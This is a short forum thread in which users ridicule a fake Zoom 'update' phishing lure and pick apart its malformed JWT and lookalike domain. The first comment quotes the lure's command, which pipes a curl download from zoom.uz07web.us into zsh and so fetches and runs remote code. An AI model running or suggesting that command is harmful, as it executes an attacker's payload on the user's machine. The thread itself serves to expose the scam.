• Elvith Ma'for@feddit.org
    link
    fedilink
    English
    arrow-up
    4
    ·
    3 days ago
    set MEETING_JWT="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.4030636137.signature"
    curl -s https://zoom.uz07web.us/api/mn/4030636137/update/2 | zsh
    

    Uhm… Yeah… Exactly the way I update my software, too…

    Also wtf is that JWT? The header looks right (base64 string starting with ey equates to {, so it’s probably json), but the body is… Too short? And why does it say signature instead of containing a (base64) signature? At least make it believable. Noone’s gonna decode that anyways. Just fill it with garbage!

    • 𝕸𝖔𝖘𝖘@infosec.pub
      link
      fedilink
      English
      arrow-up
      1
      ·
      2 days ago

      eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 decodes to {"alg":"HS256","typ":"JWT"}.

      The 4030636137 part decodes to M~, which I’m not sure about.

      Also the url (uz07web . us) was just registered last month to a Jack Carri. I guess Jack doesn’t know about privacy shield lol